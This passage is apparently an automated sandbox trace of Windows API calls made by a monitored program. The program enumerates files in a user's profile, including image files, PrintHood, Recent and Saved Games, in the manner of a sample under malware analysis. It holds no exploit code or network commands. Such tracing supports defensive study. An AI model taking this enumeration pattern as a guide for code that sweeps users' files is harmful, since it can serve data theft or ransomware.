cAlternateFileName="5KLINX~1.BMP")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x775dcca0, ftCreationTime.dwHighDateTime=0x1d8a0cf, ftLastAccessTime.dwLowDateTime=0x5a62d770, ftLastAccessTime.dwHighDateTime=0x1d8a2bf, ftLastWriteTime.dwLowDateTime=0x5a62d770, ftLastWriteTime.dwHighDateTime=0x1d8a2bf, nFileSizeHigh=0x0, nFileSizeLow=0x12fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5_Xd oyQT5yLzW2rnd.bmp", cAlternateFileName="5_XDOY~1.BMP")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5260b040, ftCreationTime.dwHighDateTime=0x1d8a302, ftLastAccessTime.dwLowDateTime=0xf3173fc0, ftLastAccessTime.dwHighDateTime=0x1d8a46c, ftLastWriteTime.dwLowDateTime=0xf3173fc0, ftLastWriteTime.dwHighDateTime=0x1d8a46c, nFileSizeHigh=0x0, nFileSizeLow=0x16e78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7p5JBw.jpg", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e08dfd0, ftCreationTime.dwHighDateTime=0x1d8a4b9, ftLastAccessTime.dwLowDateTime=0x6be78d20, ftLastAccessTime.dwHighDateTime=0x1d8a5cf, ftLastWriteTime.dwLowDateTime=0x6be78d20, ftLastWriteTime.dwHighDateTime=0x1d8a5cf, nFileSizeHigh=0x0, nFileSizeLow=0x1d54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="877l5thXMZRFuEmTVa.png", cAlternateFileName="877L5T~1.PNG")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4605d080, ftCreationTime.dwHighDateTime=0x1d89f17, ftLastAccessTime.dwLowDateTime=0xeba56a10, ftLastAccessTime.dwHighDateTime=0x1d8a551, ftLastWriteTime.dwLowDateTime=0xeba56a10, ftLastWriteTime.dwHighDateTime=0x1d8a551, nFileSizeHigh=0x0, nFileSizeLow=0x2b1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="99O Q.gif", cAlternateFileName="99OQ~1.GIF")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c5dd00, ftCreationTime.dwHighDateTime=0x1d8a2f0, ftLastAccessTime.dwLowDateTime=0xa79384c0, ftLastAccessTime.dwHighDateTime=0x1d8a488, ftLastWriteTime.dwLowDateTime=0xa79384c0, ftLastWriteTime.dwHighDateTime=0x1d8a488, nFileSizeHigh=0x0, nFileSizeLow=0x11dcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9IU4er.gif", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6bcc50, ftCreationTime.dwHighDateTime=0x1d89820, ftLastAccessTime.dwLowDateTime=0x56b086a0, ftLastAccessTime.dwHighDateTime=0x1d89d55, ftLastWriteTime.dwLowDateTime=0x56b086a0, ftLastWriteTime.dwHighDateTime=0x1d89d55, nFileSizeHigh=0x0, nFileSizeLow=0x11b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ah9z8QW.bmp", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0a0be0, ftCreationTime.dwHighDateTime=0x1d8a394, ftLastAccessTime.dwLowDateTime=0x96710920, ftLastAccessTime.dwHighDateTime=0x1d8a432, ftLastWriteTime.dwLowDateTime=0x96710920, ftLastWriteTime.dwHighDateTime=0x1d8a432, nFileSizeHigh=0x0, nFileSizeLow=0x17ca5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Br-Ix6cU0omQu4 DZyj.png", cAlternateFileName="BR-IX6~1.PNG")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x255495e0, ftCreationTime.dwHighDateTime=0x1d89ded, ftLastAccessTime.dwLowDateTime=0x74d95620, ftLastAccessTime.dwHighDateTime=0x1d89ed6, ftLastWriteTime.dwLowDateTime=0x74d95620, ftLastWriteTime.dwHighDateTime=0x1d89ed6, nFileSizeHigh=0x0, nFileSizeLow=0xc04f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cbyFXHxALB9ISR--Iyv1.png", cAlternateFileName="CBYFXH~1.PNG")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce933ee0, ftCreationTime.dwHighDateTime=0x1d89ee7, ftLastAccessTime.dwLowDateTime=0xe249e000, ftLastAccessTime.dwHighDateTime=0x1d8a208, ftLastWriteTime.dwLowDateTime=0xe249e000, ftLastWriteTime.dwHighDateTime=0x1d8a208, nFileSizeHigh=0x0, nFileSizeLow=0x14b87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DvPtakSDSqUBk1s-p5E_.jpg", cAlternateFileName="DVPTAK~1.JPG")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b5e3f0, ftCreationTime.dwHighDateTime=0x1d89df2, ftLastAccessTime.dwLowDateTime=0x8fd01ca0, ftLastAccessTime.dwHighDateTime=0x1d8a496, ftLastWriteTime.dwLowDateTime=0x8fd01ca0, ftLastWriteTime.dwHighDateTime=0x1d8a496, nFileSizeHigh=0x0, nFileSizeLow=0x690a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f83rpj3sXX29oJ.jpg", cAlternateFileName="F83RPJ~1.JPG")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36d04cc0, ftCreationTime.dwHighDateTime=0x1d8a26f, ftLastAccessTime.dwLowDateTime=0xb908eb50, ftLastAccessTime.dwHighDateTime=0x1d8a42e, ftLastWriteTime.dwLowDateTime=0xb908eb50, ftLastWriteTime.dwHighDateTime=0x1d8a42e, nFileSizeHigh=0x0, nFileSizeLow=0xd8ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gO3R.jpg", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d3fc20, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xa8919430, ftLastAccessTime.dwHighDateTime=0x1d8a743, ftLastWriteTime.dwLowDateTime=0xa8919430, ftLastWriteTime.dwHighDateTime=0x1d8a743, nFileSizeHigh=0x0, nFileSizeLow=0x9e0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HPPn3l0IweJl.gif", cAlternateFileName="HPPN3L~1.GIF")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e94ed0, ftCreationTime.dwHighDateTime=0x1d89a89, ftLastAccessTime.dwLowDateTime=0xed445c40, ftLastAccessTime.dwHighDateTime=0x1d89cba, ftLastWriteTime.dwLowDateTime=0xed445c40, ftLastWriteTime.dwHighDateTime=0x1d89cba, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hyglyDuy.bmp", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa2c3f0, ftCreationTime.dwHighDateTime=0x1d89855, ftLastAccessTime.dwLowDateTime=0xd47c1510, ftLastAccessTime.dwHighDateTime=0x1d8a0eb, ftLastWriteTime.dwLowDateTime=0xd47c1510, ftLastWriteTime.dwHighDateTime=0x1d8a0eb, nFileSizeHigh=0x0, nFileSizeLow=0x170aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Iv7Y.bmp", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2b8710, ftCreationTime.dwHighDateTime=0x1d8a34a, ftLastAccessTime.dwLowDateTime=0x8a018220, ftLastAccessTime.dwHighDateTime=0x1d8a5e8, ftLastWriteTime.dwLowDateTime=0x8a018220, ftLastWriteTime.dwHighDateTime=0x1d8a5e8, nFileSizeHigh=0x0, nFileSizeLow=0x72a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="khH4Ja_FfUDbLB.gif", cAlternateFileName="KHH4JA~1.GIF")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb15a370, ftCreationTime.dwHighDateTime=0x1d8a261, ftLastAccessTime.dwLowDateTime=0xea7a4b60, ftLastAccessTime.dwHighDateTime=0x1d8a33f, ftLastWriteTime.dwLowDateTime=0xea7a4b60, ftLastWriteTime.dwHighDateTime=0x1d8a33f, nFileSizeHigh=0x0, nFileSizeLow=0x5d00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ldaf6aCTl2hfcZ.gif", cAlternateFileName="LDAF6A~1.GIF")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa56e58c0, ftCreationTime.dwHighDateTime=0x1d89b9e, ftLastAccessTime.dwLowDateTime=0x2486f080, ftLastAccessTime.dwHighDateTime=0x1d8a64f, ftLastWriteTime.dwLowDateTime=0x2486f080, ftLastWriteTime.dwHighDateTime=0x1d8a64f, nFileSizeHigh=0x0, nFileSizeLow=0x4ae4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LIaR.gif", cAlternateFileName="")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5374010, ftCreationTime.dwHighDateTime=0x1d89b24, ftLastAccessTime.dwLowDateTime=0x56a99530, ftLastAccessTime.dwHighDateTime=0x1d8a35d, ftLastWriteTime.dwLowDateTime=0x56a99530, ftLastWriteTime.dwHighDateTime=0x1d8a35d, nFileSizeHigh=0x0, nFileSizeLow=0xb205, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lv2Axv.jpg", cAlternateFileName="")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1927de40, ftCreationTime.dwHighDateTime=0x1d89d74, ftLastAccessTime.dwLowDateTime=0x364f81b0, ftLastAccessTime.dwHighDateTime=0x1d8a177, ftLastWriteTime.dwLowDateTime=0x364f81b0, ftLastWriteTime.dwHighDateTime=0x1d8a177, nFileSizeHigh=0x0, nFileSizeLow=0x18586, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NCUi5d__zR45D.gif", cAlternateFileName="NCUI5D~1.GIF")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2827230, ftCreationTime.dwHighDateTime=0x1d89a87, ftLastAccessTime.dwLowDateTime=0x83a36680, ftLastAccessTime.dwHighDateTime=0x1d89df2, ftLastWriteTime.dwLowDateTime=0x83a36680, ftLastWriteTime.dwHighDateTime=0x1d89df2, nFileSizeHigh=0x0, nFileSizeLow=0x1083c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NE4TCssID4OKfQf7Z.jpg", cAlternateFileName="NE4TCS~1.JPG")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73af21c0, ftCreationTime.dwHighDateTime=0x1d8a4db, ftLastAccessTime.dwLowDateTime=0x198b8ef0, ftLastAccessTime.dwHighDateTime=0x1d8a5c0, ftLastWriteTime.dwLowDateTime=0x198b8ef0, ftLastWriteTime.dwHighDateTime=0x1d8a5c0, nFileSizeHigh=0x0, nFileSizeLow=0x280c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OM3A-O87OLj.gif", cAlternateFileName="OM3A-O~1.GIF")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8669490, ftCreationTime.dwHighDateTime=0x1d8a00d, ftLastAccessTime.dwLowDateTime=0xcc805dc0, ftLastAccessTime.dwHighDateTime=0x1d8a042, ftLastWriteTime.dwLowDateTime=0xcc805dc0, ftLastWriteTime.dwHighDateTime=0x1d8a042, nFileSizeHigh=0x0, nFileSizeLow=0x59c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ooz2bCVbPPEb9WsU.png", cAlternateFileName="OOZ2BC~1.PNG")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe941e920, ftCreationTime.dwHighDateTime=0x1d8a023, ftLastAccessTime.dwLowDateTime=0x6d4d10a0, ftLastAccessTime.dwHighDateTime=0x1d8a029, ftLastWriteTime.dwLowDateTime=0x6d4d10a0, ftLastWriteTime.dwHighDateTime=0x1d8a029, nFileSizeHigh=0x0, nFileSizeLow=0x151e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oQ7roSq7BYOcKq_wI3.gif", cAlternateFileName="OQ7ROS~1.GIF")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ce64d70, ftCreationTime.dwHighDateTime=0x1d8a277, ftLastAccessTime.dwLowDateTime=0xed638760, ftLastAccessTime.dwHighDateTime=0x1d8a3e9, ftLastWriteTime.dwLowDateTime=0xed638760, ftLastWriteTime.dwHighDateTime=0x1d8a3e9, nFileSizeHigh=0x0, nFileSizeLow=0x9165, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QG2UxZ3cw8a4fuoL_L.gif", cAlternateFileName="QG2UXZ~1.GIF")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52256fa0, ftCreationTime.dwHighDateTime=0x1d89978, ftLastAccessTime.dwLowDateTime=0xe5a50c50, ftLastAccessTime.dwHighDateTime=0x1d8a070, ftLastWriteTime.dwLowDateTime=0xe5a50c50, ftLastWriteTime.dwHighDateTime=0x1d8a070, nFileSizeHigh=0x0, nFileSizeLow=0x18541, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rWx9qkj.png", cAlternateFileName="")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c8ca6f0, ftCreationTime.dwHighDateTime=0x1d8a5a6, ftLastAccessTime.dwLowDateTime=0x7eee78c0, ftLastAccessTime.dwHighDateTime=0x1d8a6ec, ftLastWriteTime.dwLowDateTime=0x7eee78c0, ftLastWriteTime.dwHighDateTime=0x1d8a6ec, nFileSizeHigh=0x0, nFileSizeLow=0xb664, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sfoK-fQjQEuAHhw.jpg", cAlternateFileName="SFOK-F~1.JPG")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2ebf700, ftCreationTime.dwHighDateTime=0x1d899a4, ftLastAccessTime.dwLowDateTime=0x88bd5040, ftLastAccessTime.dwHighDateTime=0x1d899dd, ftLastWriteTime.dwLowDateTime=0x88bd5040, ftLastWriteTime.dwHighDateTime=0x1d899dd, nFileSizeHigh=0x0, nFileSizeLow=0x17d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tQPcQXKKo-QTVp1zN.bmp", cAlternateFileName="TQPCQX~1.BMP")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8b7670, ftCreationTime.dwHighDateTime=0x1d89e22, ftLastAccessTime.dwLowDateTime=0xc42e2b20, ftLastAccessTime.dwHighDateTime=0x1d8a501, ftLastWriteTime.dwLowDateTime=0xc42e2b20, ftLastWriteTime.dwHighDateTime=0x1d8a501, nFileSizeHigh=0x0, nFileSizeLow=0x1870f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uCbdvMv01ecUQrS5kFhR.gif", cAlternateFileName="UCBDVM~1.GIF")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3a482b0, ftCreationTime.dwHighDateTime=0x1d89713, ftLastAccessTime.dwLowDateTime=0xff035cb0, ftLastAccessTime.dwHighDateTime=0x1d899f4, ftLastWriteTime.dwLowDateTime=0xff035cb0, ftLastWriteTime.dwHighDateTime=0x1d899f4, nFileSizeHigh=0x0, nFileSizeLow=0x13b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ujyi1dWdud6-J7Pcelmb.png", cAlternateFileName="UJYI1D~1.PNG")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86422fb0, ftCreationTime.dwHighDateTime=0x1d8a726, ftLastAccessTime.dwLowDateTime=0x9a6f6b30, ftLastAccessTime.dwHighDateTime=0x1d8a738, ftLastWriteTime.dwLowDateTime=0x9a6f6b30, ftLastWriteTime.dwHighDateTime=0x1d8a738, nFileSizeHigh=0x0, nFileSizeLow=0x4c0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vaUZY4mlwUOC1Eph.bmp", cAlternateFileName="VAUZY4~1.BMP")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 1 [0180.757] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 0 [0180.757] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.757] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.758] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\PrintHood\\") returned="PrintHood\\" [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.758] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.758] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.758] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.758] PathFindFileNameW (pszPath="") returned="" [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.758] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\PrintHood\\*" (normalized: "c:\\users\\keecfmwgj\\printhood\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 0xffffffff [0180.758] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.758] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Recent\\") returned="Recent\\" [0180.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.758] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.759] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.759] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.759] PathFindFileNameW (pszPath="") returned="" [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.759] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Recent\\*" (normalized: "c:\\users\\keecfmwgj\\recent\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 0xffffffff [0180.759] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.759] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\") returned="Saved Games\\" [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.759] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.759] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.759] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.759] PathFindFileNameW (pszPath="") returned="" [0180.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0180.760] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\*" (normalized: "c:\\users\\keecfmwgj\\saved games\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.760] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.760] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, 